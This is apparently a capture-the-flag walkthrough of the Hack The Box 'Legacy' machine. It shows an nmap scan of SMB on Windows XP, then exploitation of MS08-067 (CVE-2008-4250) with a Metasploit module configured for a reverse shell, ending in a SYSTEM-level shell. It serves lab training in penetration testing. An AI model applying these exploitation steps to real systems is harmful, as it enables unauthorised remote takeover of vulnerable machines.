Contents

🕵 HTB-Writeup : LEGACY

Recon

Port and service detection with nmap : nmap -A 10.10.10.4

The informations returned by nmap are the following :

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h27m48s, deviation: 2h07m16s, median: 4d22h57m48s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:ff:c9 (VMware)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2022-07-15T00:00:06+03:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Let’s try to connect to the port 445 (SMB) with as anonymous : smbclient -L \\10.10.10.4

It doesn’t work and after trying some other default accounts, we can’t connect to the SMB server.

Let’s dig around the SMB server on port 445. Maybe we can try CVE-2008-4250 because we can see that the SMB server is probably running on Windows XP (cf. nmap scan).

Exploit

To make it simple, we are going to use metasploit and the exploit windows/smb/ms08_067_netapi.

Now we just have to set our options like this :

1
2
3
4
* RHOST : 10.10.10.4
* RPORT : 445
* LHOST : 10.10.16.6
* LPORT : 4321

And here is the shell :

1
2
3
4
5
Shell Banner:
Microsoft Windows XP [Version 5.1.2600]
-----

C:\WINDOWS`system32>

Post-exploitation

As usual, we can find the user flag on the desktop. Same thing with the root flag as we got our revershell as system.

Tags

Easy, External, Network, SAMBA, Penetration Tester Level 2, Remote Code Execution, CVE-2008-4250, Public Vulnerabilities, CVE Exploitation